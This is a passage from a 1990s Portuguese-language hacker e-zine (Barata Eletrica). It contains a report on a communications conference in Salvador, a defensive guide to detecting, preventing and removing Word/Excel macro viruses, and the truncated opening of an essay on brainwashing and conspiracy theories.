mais "especialista" ou "geralista". E' "plastico". Traduzindo para informatiquez: se voce e um especialista em UNIX, teu saber nao muda com o passar dos anos. Ele acumula. A pessoa evolui com o Unix e aprende mais programas para usar, ate dar no em pingo d'agua com ele. Tem todo um universo que a pessoa aprende. Hard way, mas tudo bem. Agora, se voce usa Windows ou software da Microsoft, experimenta ficar fora do seu ambiente de trabalho dois ou tres anos. Se voce era um especialista em Windows, tudo bem, com o mesmo tempo disponivel podia aprender multi-midia, desktop publishing, edicao de textos, etc, etc.. mas se fosse para uma ilha deserta e voltasse dois anos depois, tudo aquilo nao ia valer nada diante do windows 95 ou win98. Quem esta se esforcando pra aprender coisa em windows, se esforcou para aprender conhecimento plastico, facil de ficar obsoleto, embora mais facil de usar e configurar... Nao sei se transmiti a ideia. O geralista seria o cara que se vira tanto em Unix, quanto no windows, e se sair nova versao, abandona o que ja aprendeu e vai em frente (ou seja, 90% dos hackers). Traduz esses conceitos e ideias para coisas como: profissao, faculdade, emprego, etc.. Foi o que entendi, talvez o Paulo Vaz tivesse outras ideias.. vai saber o que esse pessoal de filosofia (ou sei la' a area dele) pensa. Se voce fala que entende, eles falam outra coisa. Nada do que esta' nesse paragrafo ele falou, eu que to tentando passar o que entendi. Talvez isso acenda uma lampada na cabeca de voces leitores.. 14/10 - 19:00 Espaco Virtual: outros mercados Na verdade, cheguei ja tinha comecado. Ainda caindo de sono e pra piorar as coisas, como nao achava que ia ser grande coisa, nao trouxe fita pra gravar as palestras. Oh, do.. Pior e que me entupi de acaraje e o sono tambem nao tava facil.. o programa falava em Claudio Cardoso (Facom/UFBA) tenho uma vaga memoria da palestra (o pior e que nao tenho nenhuma certeza se foi ele ou outra pessoa no lugar dele, se ele estiver lendo, sorry). A palestra seguinte foi de um soteropolitano, cujo nome nao me lembro direito mesmo. O cara e publicitario. Pra que vou fazer publicidade dele no Barata Eletrica? Nao to ganhando pra isso.. o cara fez tanta questao de falar em money.. Sujeito arretado. Contou a historia de como a Web page dele transformou sua agencia de publicidade num sucesso. Sucesso leia-se: "fiz minha pagina num tempo em que os jornais de Salvador nao tinham muito o que falar da internet em ambito LOCAL, entao publicavam noticia sobre qualquer coisa que fosse feita nesse assunto". Isso significa que a pagina dele, alem de um conteudo interessante, teve o que toda agencia de publicidade gostaria de ter: noticia de jornal falando dela. O resto e facil, basta um conteudo bem povao, leia-se receitas de comidas tipicas e coisas que todo mundo gosta mas que na epoca, com a internet comecando, nao tinha. Acho que eram coisas de horoscopo e simpatias.. o povo baiano e bem mistico. Bom, o fato e que a mistura funcionou e todo mundo comentou a pagina dele. Provavelmente faltava conteudo em portugues na epoca. Entao, um caso de estar na hora certa com uma disposicao especifica e os materiais na mao. O resto da palestra podia ser sintetizado assim: "como sou inteligente, tudo aconteceu da forma prevista no tempo certo, com precisao de relogio" ou "so um genio do marketing que nem eu teria visto isso" e "internet tem que priorizar o lado comercial sim, o cara vai desenvolver um web site, tem que receber uma baita grana pra coisa ficar boa". Eu caindo de sono e tendo que ouvir isso. O Andre ate fez um contra-ponto, mostrando que na internet nao era bem assim e que gente com boas intenc⌡es fazia acontecer e etc, etc.. comentando esforcos de gente que nem eu. Falou tao legal que ate me deu "animo" pra fazer umas perguntas ("capciosas") depois. O que levantou um pouco o astral foi a palestra da Marion Strecker, do todo-poderoso Universo On Line. Ou deveria dizer: o futuro Braz-Compuserve? Achei genial porque os chats do UOL (enquanto servico gratuito) sao uma verdadeira coqueluche em varias faculdades da USP. Gente que morria de medo de computador agora fica direto la ou www.zaz.com.br que parece que tambem tem o servico. E .. de vez em quando pintam umas coisas, como a pesquisa sobre a juventude do futuro, feita pela Agencia Folha ou sei-la o que. E' tudo grupo Folha, para mim, apesar de saber que o UOL e um baita provedor internet, etc, etc.. Foi otima a palestra, porque ela mostrou e discutiu o esforco da empresa em criar esse ambiente cyber, desenvolver paginas para varias revistas, reunir tudo num so lugar, coisas do genero. Depois falou da tal pesquisa: "O jovem, a sociedade e a midia do proximo milenio". Estragou uma parte da minha fala. Tem varias formas de analisar aqueles resultados. Mas sao pesquisas importantissimas. Sao estes graficos que os caras mostram pros anunciantes na hora de conversar os precos dos anuncios: "ta vendo, nossos anuncios sao caros porque funcionam, olha so quanta gente acessa". E o esforco do UOL para ter um dos maiores numeros de acesso, alcancando o Yahoo (alias desenvolveram sua propria ferramenta de busca). Em seguida (e esta foi a parte que mais gostei), falaram sobre o perfil do trabalhador do futuro, no que se refere ao UOL. Infelizmente, nao gravei esta parte, gente. Tava morto de sono e portanto nao tenho certeza de tudo o que ouvi, mas acho que foi mais ou menos assim: "Para nos, o profissional do futuro tera que ser capaz de atuar em varias areas. Tem que ser capaz de dominar uma lingua estrangeira, de preferencia, ter vivido num pais ou outra cultura. Saber tambem se situar com um computador, sendo capaz tanto de assumir o papel de editor como diagramador em linguagem html. Tem que ter um vocabulario rico e ser capaz de escrever com um estilo conciso, inteligente e ligeiramente sarcastico, ter uma iniciativa capaz de sozinho fazer uma publicacao". Nao, nao foram estas palavras, mas eu juro que a Marion descreveu o trabalho que eu faco no Barata Eletrica. Tudo bem.. chegou a epoca das perguntas: "Qual o interesse da UOL em fazer esse universo tao legal e gratuito? E' fazer propaganda do servidor internet UOL?" Ela confirmou que realmente o material disposto no UOL nao se paga, as revistas que podem ser consultadas la gratuitamente nao representam um retorno financeiro que compense. Uma semana depois, quando voltei a acessar, descobri que varias areas do UOL passaram a ser especificas para assinantes (e uma promocao "traia o seu servidor, mude para ca"). Ou seja: primeiro, acostumaram todo mundo com um ambiente de acesso gratuito a informacao, areas de chat, etc.. depois comecaram a cobrar. Me lembro alguma coisa sobre ela ter me dito que a UOL tinha comprado o que antes era conhecido como Compuserve, uma multinacional no que se refere a acesso rede nao-gratuito. O Compuserve e o que seria a internet nao-gratuita; um shopping center da informacao. Ate o correio eletronico, se a pessoa receber muito, paga mais caro. Mas o que mais me deu prazer foi no final da palestra, quando ja estava todo mundo indo embora, perguntar para ela, nao na frente de todo mundo (achei que seria meio indelicado) algo.. meio pessoal. Seguinte: o UOL tinha aberto vaga para redator. 2 paus por mes. Uma pagina de curriculo cujo formulario voce preenchia on-line. Eu tinha preenchido esse formulario (embora deixasse em branco algumas coisas e nao falasse toda a minha vida, se eu preenchesse tudo, o cara dos Recursos Humanos ia poder escrever minha biografia). Bom. Nunca recebi uma unica resposta. E eu sou tudo aquilo que ela tinha falado (ta bom, minhas paginas html nao sao aquela coisa, mas eu faco). Nunca recebi uma resposta por email. Que que ela achava disso? "E' , voce tem razao, o minimo era ter te mandado um email de volta, nao sei o que aconteceu". Ai eu falei pra ela: "deve ser por causa da idade" ela: "nao, por isso nao. Nao sei o que pode ter sido". Perguntei isso em particular (e nao em publico) porque me lembrei de um leitor do Barata que chegou para mim (sobre um artigo de "curriculum vitae" e um texto sobre geracao X) e contou como "detonou" com a palestra de um executivo de multinacional. Falou no inicio "queremos o nivel maximo de lealdade dos nossos funcionarios" e perto do final falou "infelizmente, teremos que realizar grandes cortes na folha de pagamento para poder manter a empresa". O palestrante nao sabia o que responder quando esse meu amigo perguntou: "como e que voce espera manter a lealdade de um funcionario que sabe que pode N├O estar numa lista de Schindler (obs: a lista dos que vao continuar na empresa)?". A maioria das empresas contratam quem eles querem, despedem quando estao a fim e talento ou competencia nao tem nada a ver. Se tivesse, varios politicos nao teriam conseguido galgar o poder ate chegar a deputado, senador ou presidente. Dia 15/10 - 15:00 Politicas e leis das tecnologias digitais Finalmente, to na mesa com o Vicente Landim (Ministerio da Ciencia e Tecnologia). Esclareceu algumas coisas incriveis sobre jurisdicao antes da conferencia comecar. A palestra que tinha preparado nao foi tao interessante quanto poderia ter sido. Falha tecnica. Simplesmente ele tava por dentro de coisas mais interessantes, mas na hora so tinha trazido aquilo que falou. Ta gravado, mas ja esqueci o que e. So sei uma coisa: e legal que o pessoal comece a se mobilizar contra a legislacao sobre o ciberespaco que aquele "senhor" da Paraiba esta aprontando. Comece a pressionar o congresso para nao aprovar. O dia em que ela for aprovada eu paro de publicar o Barata Eletrica. A palestra do Andre Lemos foi bem decente. Tudo o que eu nao falei na minha ele falou e completou na dele. Ciberespaco, PGP, Clipper, Criptografia, Operacao Sundevil, Computer Underground, achei que nao ia dar tempo. Como chefe da mesa, ele conseguiu. Muito boa. A minha foi um breve (45 minutos) historico sobre como fiz o primeiro fanzine em lingua portuguesa na Internet. O porque do nome, consegui minha conta internet, sendo da Letras, numa epoca em que nem todo o pessoal do 3o ou 4o ano do IME-USP (Instituto de Matematica e Estatistica da USP) sabia disso. Foi "tao emocionante". O pessoal curtiu a coisa. Fui meio hilario uma hora, mas pelo menos ninguem dormiu. Foi legal pra mim porque senti meu trabalho sendo reconhecido, do ponto de vista academico. Fiz a prova de Pos em Jornalismo. Eles queriam 7.0, eu tirei 5.0. Chato para eles e para a Faculdade de Jornalismo da USP. Por hipotese, amanha os alunos daquela faculdade e de muitas outras de jornalismo no Brasil, vao estar estudando experiencias como a minha. Isso e um fato, nao e viajar na maionese. E (hipotese) se daqui a cem anos o pessoal resolver que meu trabalho merece elogios, nao vao falar que foi "culpa" ou "influencia" da faculdade de jornalismo. Se bem que passei na Pos em outro lugar da USP e parece que alguem de jornalismo vai co-orientar minha tese. 15/10 - 19:00 - Um novo jornalismo: informatizado/online Umas pustas dumas palestras interessantes. Mais ainda porque teve gente que N├O veio. Conheci o Fernando Vilela, editor do "G???? ?? I??????.??", entre outros palestrantes. Mas antes tivemos que ouvir uma palestra ate razoavel de um cara da prefeitura, contando como funciona(ria) a Secretaria de Comunicacao de Salvador. Tinha gente na plateia que garantiu que quase tudo ali era teoria. Teoricamente, um pessoal ficaria de olho nos jornais, recortando as materias sobre a politica local, recortaria, faria um resumo sobre o que valesse a pena, depois faria copias, mandaria via taxi para outro escritorio que tomaria ou nao uma posicao a respeito, outro resumo do que fazer e nao fazer, outro relatorio para ser copiado e despachado para todas as repartic⌡es administrativas da cidade de Salvador. Isso o sujeito ficou descrevendo durante meia hora, para depois falar que uma intranet permitiu reduzir consideravelmente os problemas de se levar essa papelada toda pra la e pra ca pela cidade, em plena hora do rush, que e quando tudo ficava pronto. Interessante do ponto de vista de logistica, mais nada. A do Fernando Vilela, "o mineiro mais carioca nascido em Brasilia", era bem esperada pela plateia. Tava muito nervoso pra falar em publico. Comentou do problema de excesso de informacao (perdeu um pouco do pique de ficar por dentro de tudo, mas por quest⌡es profissionais nao podia mudar os habitos). Apresentou algumas ideias fantasticas que estava desenvolvendo para a Pos, como por exemplo o que seria dois planetas interligados pela internet, se eles funcionariam como seres vivos gigantescos, umas coisas que a cibercultura anda pensando aqui e ali. Tambem falou da experiencia dele com a ???????.??, quatro ou cinco pessoas que estavam na faculdade e se uniram pra fazer aquela revista. Foi legal bater um papo com o cara, apesar da revista dele ate hoje nao ter incluido o Barata Eletrica no G??? ?? ????????.??, ja que ate "Ze do Caixao" os caras colocaram. Falta de informacao ou resolveram que "nao merece"? Semana passada dei uma olhada na ultima edicao e parece que pelo menos mencionaram numa reportagem e de forma ate boa. Nao tava ruim. Houve tambem uma palestra de um outro professor da FACOM (Faculdade de Comunicacao), nao me lembro se foi o Marcos Palacios, que fez uma explendida exposicao da tecnologia Push e o futuro da imprensa escrita versus o jornalismo via internet. Nao cabe aqui explicar todos os detalhes. Muita coisa. Basicamente, o que e o trabalho de um cara, que recebe todas as noticias e tenta encaixar em uma ou duas paginas, na va tentativa de passar o que esta acontecendo no mundo la fora, esse trabalho pode ser feito por qualquer um, ligado a internet. Da um artigo inteiro no Barata Eletrica. Talvez num proximo numero. Escrevendo isso, me lembro que teve tambem o pessoal de outro jornal que entrou on-line que tambem deixou a experiencia dele com o jornalismo na internet. A unica coisa que ficou e que existe uma preocupacao em nao soltar determinadas noticias antes que a edicao chegue as bancas, para nao prejudicar um determinado "furo" de reportagem. Nao tenho certeza se esse palestrante foi o Demostenes Teixeira (Correio da Bahia) ou Alberto Oliveira (A Tarde). Ou se nao foi nenhum dois e sim outra pessoa. To com o roteiro aqui na mao enquanto escrevo, mas teve coisa que nao gravei e sei tambem que houve modificac⌡es por conta de gente que nao pode vir ou mudou de dia. Outra palestra muito boa foi do Roberto Izabor (Telebahia). Massa. Explicou em detalhes como foi a implantacao da primeira web-tv no Brasil, permitindo ao pessoal la fora assistir nossa "maravilhosa" TV Globo. E entrou fundo em trocentos detalhes referentes ao inicio, presente e futuro da Internet aqui (ou deveria dizer la na Bahia). Falou da privatizacao das linhas telefonicas, novas tecnologias, de novo o etc, etc.. Nao e coisa tambem para meia duzia de linhas. Esse tipo de palestra eu gravo em fita k-7 pra futura referencia.. qualquer dia boto num CD. Depois da palestra fui numa festa da faculdade com um pessoal da Comunicacao, incluindo umas meninas com quem tentei algumas tecnicas de "Engenharia Social". Inutilmente. Qualquer um que mexa com producao artistica da de dez em termos de jogo de cintura. Nao adianta nem "fingir" sinceridade. Mas foi legal. Deu ate vontade de fazer Pos la, apesar que e muito dificil. Os caras de la querendo descer para ca e caras daqui querendo subir para fazer Pos la, onde tem alta concorrencia. E' uma das poucos Universidades no Nordeste onde tem essas materias. Rolou um papo em cima, incluindo uma discussao sobre a tal "mineiridade". O pior e que as pessoas tem curiosidade em saber o que um mineiro pensa disso. E' meio estranho discutir o tema. O pior e que quando entro nesse assunto, acabo fazendo propaganda de uma tese que nao li, so folheei, chamada "a mitologia da mineiridade" (Arruda, Maria A do Nascimento) defendida na USP. Minas Gerais deve ser algo meio misterioso pra quem nao e de la.. Dia seguinte, 16/10, teve (de acordo com o roteiro): * Digitalizacao e espacos virtuais * O pixel e o pincel: a arte e as tecnologias digitais. Infelizmente nao pude comparecer. Assim que o Gadelha me der um toque sobre se a equipe fez ou nao a transcricao do evento e/ou gravacao das conferencias que perdi, eu trabalho numa possivel continuacao dessa materia, envolvendo o dia 16/10. De resto, so dei uma role com o pessoal da Faculdade, que mostrou os pontos turisticos, como o Pelourinho e as praias. Depois, aeroporto e back to Sao Paulo. Foi tao rapida minha visita (medo de duas provas nos dias seguintes) que nem entrei numa praia. Me da um medo ir pra uns lugares desse tipo. Conheci um cara que foi passar as ferias no Ceara. Voltou 17 anos depois. Nem o FGTS ele foi atras. A I COM BAHIA e uma prova que ja se pode fazer uma conferencia Cyber no Brasil. Nao e como quando fui para a Argentina. Tudo depende e de ter uma soma de fatores: um ambiente legal, uma turma boa para organizar e gente que apoie, tanto com patrocinios como com outros tipos de apoio. So acho uma pena que quando fui nao avisei a mocada que conhecia em Salvador. A maior parte do publico era de gente da propria faculdade. Faltou um pouco de divulgacao aqui no Sul, podia ter sido muito mais divulgado. Varios fas do Barata Eletrica perderam a chance (parece coisa de convencido, mas infelizmente ou felizmente, e fato, fazer o que?). Era um evento mais ligado a Comunicacao e Jornalismo, mas hoje, quem se liga na Internet, tem um pe dentro dessas duas materias. A Faculdade de Comunicacao da UFBA mostra que iniciativa traz resultados concretos. Parabens. Tudo o que voce sempre quis saber sobre VIRUS DE MACRO(Word/Excel) Quem e' que nunca ficou tentando salvar um documento no Word e ele nao aceitava a extensao .DOC, mas so .DOT? Ou quem nunca ficou vendo mensagenzinhas rolando na barra de status (rodape') do Word, achando aquilo muito engracadinho? Voce podia ate' nao saber, mas estava diante da categoria de virus mais comum que existe hoje em dia: os virus de macro. NPAD, MDMA, DMV, CAP, Indonesia, WordPrank, Concept, Nuclear... Em geral, pouco mal trazem. Nao danificam arquivos nem provocam perda de dados, mas causam uma serie de aborrecimentos que atrapalham todo o seu trabalho. E tao grande quanto a sua difusao e a falta de informacao a respeito deles. Se voce chegou a ler este texto ate aqui, nao pare. Leia-o ate o fim. Se preferir, imprima-o e leia depois com mais calma. E procure principalmente divulgar o que aprender. A informacao e a vacina que pode nos ajudar a livrar a Internet destes virus, tao simples mas tao comuns. ------------------------------ O QUE E UM VIRUS? Virus e' um programinha, com uma serie de instrucoes "maldosas" para o seu computador executar. Em geral, ficam escondidos dentro da serie de comandos de um programa maior. Mas eles nao surgem do nada. Sao feitos por gente desocupada, que nao tem nada o que fazer e fica criando bobagens para encher o saco dos incautos. E o pior e' que, em geral, eles atingem seu objetivo. Os virus se ocultam em arquivos executaveis, ou seja: de programas, sempre de extensao .EXE ou .COM, ou de bibliotecas compartilhadas, de extensao .DLL. Quanto a arquivos de dados, voce pode abri-los sem medo! Assim, pode rodar tranquilamente seus arquivos de som (.WAV, .MID), imagem (.BMP, .PCX, .GIF, .JPG), video (.AVI, .MOV) e os de texto que nao contenham macros (.TXT, .WRI). Para que o virus faca alguma coisa, nao basta voce te-lo em seu computador. Para que ele seja ativado, passando a infectar o micro, e' preciso executar o programa que o contem. E isto voce so' faz se quiser, mesmo que nao seja de proposito. Ou seja: o virus so e ativado se voce der a ordem para que o programa seja aberto, por ignorar o que ele traz de mal pra voce... Se eles nao forem "abertos", ou seja, "executados", o virus simplesmente fica inativo, alojado, aguardando ser executado para infectar o computador. Apos infectar o computador, eles passam a atacar outros arquivos. Se um destes arquivos infectados for transferido para outro computador, este tambem vai passar a ter um virus alojado, esperando o momento para infecta-lo, ou seja: quando for tambem executado. Dai o nome de virus, pela sua capacidade de auto-replicacao, parecida com a de um ser vivo. ------------------------------ VIRUS DE MACRO Recentemente, vem se espalhando uma nova especie de virus, que hoje ja' corresponde a mais de 50% do total de infeccoes. Sao os famosos "virus de macro". Eu recebi ontem mesmo um arquivo do Word contaminado com um "virus de macro". E quem o enviou foi um amigo de Internet. Tenho certeza de ele nao mandou o arquivo com maus propositos -- pelo contrario, e uma vitima destes virus tanto quanto eu. Pra mim ja e uma rotina. De cada dez arquivos de Word que recebo, um esta contaminado. Alias, e bem provavel que seu computador ja tenha um virus de macro agora. So que voce ainda nao percebeu, ou o deixou ficar quieto. Mas afinal de contas, o que e macro? Macro e uma serie de rotinas personalizadas para serem feitas automaticamente no Word, ou no Excel, ou qualquer outro programa que suporte VBA (Visual Basic for Applications), a linguagem usada nas macros. Os virus de macro mais comuns sao os do Word, por ser o programa mais difundido. Voce pode criar uma macro pra acrescentar um cabecalho automaticamente assim que voce clica num botao da barra de ferramentas, ou para abrir o Painel de Controle apenas com uma combinacao de teclas, ou ainda para retirar todas as cedilhas, acentos etc. de um texto. A macro e quase um programa, interno a outro programa. O virus de macro e um virus feito na linguagem das macros, para funcionar dentro do programa ao qual esta ligado. Ao abrir um documento de Word (.DOC) infectado com um virus de macro, o virus e ativado, gravando sobre o arquivo NORMAL.DOT (modelo geral dos arquivos do Word) e criando macros que substituem boa parte dos comandos normais do Word. A partir dai, quando voce estiver usando o Word, voce vai comecar a verificar sintomas os mais diversos, dependendo do virus que voce tem. Se voce verificar algum dos abaixo relacionados, provavelmente seu computador ja esta infectado: - quando voce tenta salvar um arquivo, ele salva com a extensao .DOT em vez de .DOC; - todos os arquivos do Word sao salvos assim que voce o fecha, como Doc1.doc, ou Doc2.doc, e assim por diante, sem sequer perguntar se quer salva-lo ou nao; - uma mensagenzinha fica correndo pelo rodape da janela do Word; - palavras ficam aparecendo sem voce digita-las e imediatamente se apagam; - a impressora trava sem explicacao; - o computador fica "trabalhando" (ampulheta) sem que voce peca para fazer nada; - retira dos menus todas as mencoes a macro, de forma que voce fica impedido de manipular as macros para retirar o virus; - todas as macros personalizadas que voce tenha criado antes sao perdidas (esta e a pior sequela). Uma vez infectado o arquivo NORMAL.DOT, todos os outros arquivos que forem abertos no Word a partir de entao serao infectados. Se voce enviar um arquivo infectado para alguem, por disquete ou e-mail, ele pode infectar o computador do destinatario, se ele o receber e o abrir no Word, e o ciclo recomeca. Os virus de macro nao estao escondidos na forma de um arquivo executavel (.EXE, .COM, .DLL), mas em um inocente documento do Word (.DOC) ou numa planilha do Excel (.XLS). Trata-se de uma verdadeira revolucao dos virus. E ai esta a causa da facilidade com que eles se propagam. As macros se transformaram em verdadeiras armas postas α disposicao de quem quer fazer um virus. Ninguem imagina que um texto que a namorada escreveu ou uma planilha que um colega de trabalho mandou possa estar infectado. E a pessoa que lhe enviou o arquivo com o virus pode nem saber (e geralmente nao sabe) da infeccao... Ainda assim, e bom frisar: mesmo os virus de macro so infectam seu micro se voce abrir o arquivo que o contem. Nao basta receber o arquivo infectado, seja por que meio for: e necessario abri-lo para que o virus seja ativado. ------------------------------ COMO EVITAR OS VIRUS DE MACRO O que podemos fazer para evitar virus de macro? Uma das opcoes e' infalivel! Marcar o arquivo NORMAL.DOT como "somente leitura" ("read-only") e, de todas, a melhor opcao, e tambem a mais radical. Como fazer isto? Em primeiro lugar, localize este arquivo. Geralmente, ele fica no diretorio (ou pasta) onde esta o Word. No Windows 95, basta clicar com o botao direito do mouse sobre o nome do arquivo, selecionar "Propriedades" e marcar o quadradinho com o nome "somente leitura". No Windows 3.x, o procedimento e semelhante: abre-se o Gerenciador de Arquivos, localiza-se o NORMAL.DOT, clica-se sobre ele uma vez so com o mouse, e, no menu Arquivo | Propriedades..., marca-se o "somente leitura". E' tao facil assim evitar virus de macro? Em principio, sim. O arquivo NORMAL.DOT e' o modelo global em que se baseiam todos os documentos que feitos no Word, e e' o primeiro a ser infectado assim que o virus se aloja. Se ele nao puder ser sobregravado, o arquivo com o virus pode ate' ser aberto, mas nao vai conseguir modificar o NORMAL.DOT, que esta protegido contra gravacao. E se eu precisar mesmo alterar o NORMAL.DOT? Bem, este arquivo so precisa ser modificado muito raramente, quando voce faz uma alteracao em um parametro no modelo geral do Word -- por exemplo: escolhe uma nova fonte padrao, ou uma margem maior, ou um estilo de documento, ou um novo botao na barra de ferramentas, valido para todos os documentos do Word. Pouca gente faz isto com frequencia. Se voce, por acaso, precisar fazer uma destas alteracoes, basta desmarcar o "somente leitura", fazer a alteracao e depois voltar a marca-lo. Eu utilizo o VirusScan, que pode ser obtido gratuitamente na pagina da McAfee -- alias, recomendo a todos que facam isto agora (nao deixe para depois...). Vamos todos na pagina da McAfee (http://www.mcafee.com) retirar a versao mais nova do anti-virus. O arquivo mede cerca de 4 MB. Pode demorar ate uns 15 minutos, dependendo de sua conexao, mas e um tempo muito bem investido. Se voce for surpreendido por um virus mais tarde, voce vai ver que o tempo (e o gasto de paciencia) para elimina-lo sera bem maior. De 45 em 45 dias, retorne la para retirar a versao mais nova dos arquivos DAT do anti-virus. Frise-se bem: depois que voce ja tem o programa VirusScan, nao e mais necessario tirar todo o anti-virus de novo quando sua versao ficar desatualizada. Basta retirar uns poucos arquivos terminados com a extensao .DAT, que sao os que guardam informacoes sobre os virus., que juntos, tem apenas 1 MB. Voce pode obter a ultima versao destes arquivos .DAT diretamente no endereco: http://www.mcafee.com/down/dldat.html O processo para instalar os novos arquivos .DAT e um pouco mais chato, por ser manual. Depois de retirar e descompactar os arquivos .DAT, localize onde estao os seus atuais arquivos .DAT (ja desatualizados) do VirusScan (em geral, estao em: c:\Arquivos de Programas\McAfee\VirusScan\). Basta arrastar os novos arquivos .DAT para esta pasta, confirmar a substituicao e pronto. Voce esta de novo com as vacinas em dia. Informacoes da McAfee sobre virus de macro: http://www.mcafee.com/support/techdocs/vinfo/t0016.html Outra opcao para prevenir virus de macro: va' na pagina da Microsoft. La' existe uma ferramenta, chamada ScanProt, na verdade um modelo (.DOT) com um conjunto de macros para protecao do Word. Voce o abre no Word e a instalacao e automatica. O arquivo inclui um manual, todo EM PORTUGUES, em formato Word, explicando tudo. Este ferramenta vai avisa-lo sempre que um arquivo .DOC contendo uma macro esta sendo aberto, mesmo que nao contenha virus. E permite que voce opte por abrir o arquivo sem executar as macros. O endereco e': http://www.microsoft.com/word/freestuff/mvtool/virusinfo.htm O Word versao 95a ou o Word 97 ja trazem esta ferramenta embutida. Mas ha' uma atualizacao dela em http://www.microsoft.com/office/antivirus/word/wordprot.htm Para informacoes sobre virus de macro no Excel, va em http://www.microsoft.com/excel/productinfo/vbavirus/emvolc.htm ------------------------------ Na primeira vez em que eu fui atacado por um virus de macro, eu estava com o anti-virus instalado e funcionando. Mas, por um descuido meu, a versao dos arquivos .DAT era de fevereiro. E ja corria o mes de abril. Fui negligente achando que uns poucos meses de atraso nao iam fazer diferenca. Fizeram, e muito! O virus que peguei simplesmente nao foi detectado pelo anti-virus atrasado que tinha. Dai, alerto: nao adianta nada ter um anti-virus se voce nao o atualiza todo mes. Depois da casa arrombada, passei o VirusScan ultima versao da epoca, e ele detectou, de pronto, o virus CAP. Limpou, direitinho e com a maior facilidade do mundo, os arquivos infectados. Por uma coincidencia incrivel, naquela mesma semana eu estava comentando sobre virus de macro com colegas. Um deles me disse que, na reparticao onde ele trabalha, ha um virus de macro ha 5 meses, e nunca ninguem cuidou de elimina-lo, apesar de todos os incomodos que ele causa. Assim que fui infectado, fui procurar ajuda no meu BBS. Um amigo me disse, com ar de certo "desdem"... :-): Todo mundo tem este virus! E verdade. Parece ate uma gripe. Todo mundo tem, e parece ate inevitavel te-lo. Mas poderiamos fazer mais para evita-lo. Ou para elimina-lo, depois de feito o estrago. ------------------------------ COMO ELIMINAR OS VIRUS DE MACRO Quem tem um virus de macro so' nao o elimina se nao quiser. Os anti-virus estao ai para detecta-los e elimina-los com facilidade. E possivel encontrar um virus de macro mais dificil de ser removido, mas sao casos excepcionais. Para remover virus de macro, experimente um destes anti-virus: McAfee Virus Scan: http://www.mcafee.com F-Macrow: http://www.europe.datafellows.com Dr. Solomon's Anti-Virus Toolkit: http://www.drsolomon.com Norton Anti-Virus: http://www.symantec.com/avcenter/hotv.html PC-Cillin 95: http://www.trendmicro.com.br Thunderbyte Anti-Virus: http://www.thunderbyte.com VirusSafe 95: http://www.eliashim.com/index.html InterScan VirusWall: http://www.com.tw F-Prot: http://www.commandcom.com HouseCall: http://www.antivirus.com ------------------------------ COMO ELIMINAR SEQUELAS DOS VIRUS Pode ser que, mesmo depois de eliminado o virus de macro, ainda restem algumas sequelas no seu Word: menus faltando, botoes a menos, travamentos, combinacoes de teclas desativadas. Primeiro, tente seguir as dicas que voce encontra nesta pagina, no site da McAfee: http://www.mcafee.com/t0118.html. La, voce pode retirar o programa DocFix, especifico para resolver estes problemas. Se nao der certo, ha uma solucao radical, mas eficiente, a ser tentada em ultimo caso. Delete o arquivo NORMAL.DOT. Automaticamente, o Word criara outro NORMAL.DOT, com as configuracoes-padrao do programa. A desvantagem e que voce perdera as suas configuracoes personalizadas: se voce tinha alguma configuracao personalizada (Autotexto, Macros, barras de Ferramentas personalizadas), elas serao perdidas. Mas pelo menos, voce tem a certeza de que as sequelas sumirao. Agora, de nada adianta tudo isto se voce ainda tiver algum documento do Word infectado no seu computador, que pode infectar o NORMAL.DOT novamente a qualquer momento. Passe o anti-virus antes de fazer o descrito acima. Depois de terminar o reparo, nao esqueca de colocar o novo NORMAL.DOT como somente-leitura. ------------------------------ MAIS INFORMACOES SOBRE VIRUS DE MACRO voce pode obter nas paginas: http://www.microsoft.com/office/antivirus/ http://www.microsoft.com/MSWordSupport/content/usage/MacroVirus/ http://www.mcafee.com/t0016.html http://www.datafellows.com/macro/word.htm http://www.bis.com.br/~lafanet ------------------------------ Peco a todos os que chegaram ate o fim deste texto que se juntem a esta ideia. Alias, esta ideia nada deve ter de original! Nao tenho dados, mas estimo que 99% dos usuarios de Internet nao usam anti-virus, ou tem anti-virus atrasados. E que 90% dos usuarios de Word tem um virus de macro, mas nunca perceberam, ou, se perceberam, deixam o bichinho la' quieto, apesar do incomodo que eles causam. ---------------------------------------------------------------------- PAULO GUSTAVO SAMPAIO ANDRADE Estudante de Direito na UFPI Editor da pagina juridica "Jus Navigandi" (http://www.geocities.com/Paris/1997) Teresina - Piaui - Brazil E-mail: jus@mail.org Batalha pela Mente: Lavagem Cerebral Derneval R.R. da Cunha As pessoas que foram assistir o filme "Teoria da Conspiracao", entrando em cartaz recentemente, podem pensar algumas das seguintes ideias: * Nao gostei. * Nao entendi * Adorei * Esse cara parece alguem que conheco. Vou avisar pro cara que ele nao esta sozinho no Universo. Ja pode fazer contato. E' , a coisa pode ser engracada. Para quem nao viu o filme, vou resumir um pouco. O personagem interpretado por Mel Gibson e um cidadao comum ou coisa do genero que tem como hobby ler jornais em busca das "entrelinhas" de cada coisa e procura editar essas entrelinhas num "fanzine" ou "pasquim" que leva o nome de "Teoria da Conspiracao". O grande amor da vida dele e uma funcionaria do governo e por ai vai. A vida do sujeito e dirigir o taxi dele, editar o fanzine, distribui-lo e ficar de olho no "grande amor da vida dele". Literalmente de olho. Ou como diria alguem, praticando a "substituicao do sexo pela contemplacao passiva da folha da alcachofra"(Luiz F.Verissimo?). Ate acontecer uma serie de coisas estranhas na vida do cara. Ele esta sendo perseguido. Ninguem acredita na historia dele, porque ele vive inventando historias. Coisa mais ou menos nessa linha abaixo: * "O movimento hippie foi criado em Moscou e, se os pais nao orientarem cuidadosamente a juventude, o comunismo acabara dominando o Brasil"(1) "A mais abominavel tatica - dos comunistas - e a da disseminacao das drogas, que ira destruir mais a proxima geracao do que a nossa, ja que ataca nossos filhos"(2) * "O sexo e um instrumento usado pelos psicopoliticos para perverter e alienar a personalidade dos individuos, principalmente das autoridades, para anula-las e converte-las em escravos servis. Dai partirem para o descredito das familias, dos governos, e passam α degradacao da nacao, bem como intensificam a divulgacao da literatura erotica e da promiscuidade sexual (3) * "A Russia tem conseguido alterar a literatura democratica dos Estados Unidos e tem introduzido naquela nacao os principios de Marx e os dados do materialismo dialetico nos textos estudantis de psicologia, ate o ponto em que qualquer um que estude a fundo a psicologia, se convertera em candidato a comunista militante. Quase todas as catedras de psicologia dos EUA estao nas maos dos comunistas"(3). * "Quase todos (os jornalistas que cobrem a Camara dos Deputados) sao criptocomunistas, especialmente os bigodudos. Reporter comunista eu conheco pelo jargao que usa" (4). * "O inimigo e indefinido, usa mimetismo, se adapta a qualquer ambiente e usa todos os meios, licitos e ilicitos para lograr seus objetivos. Ele se disfarca de sacerdote ou de professor, de aluno 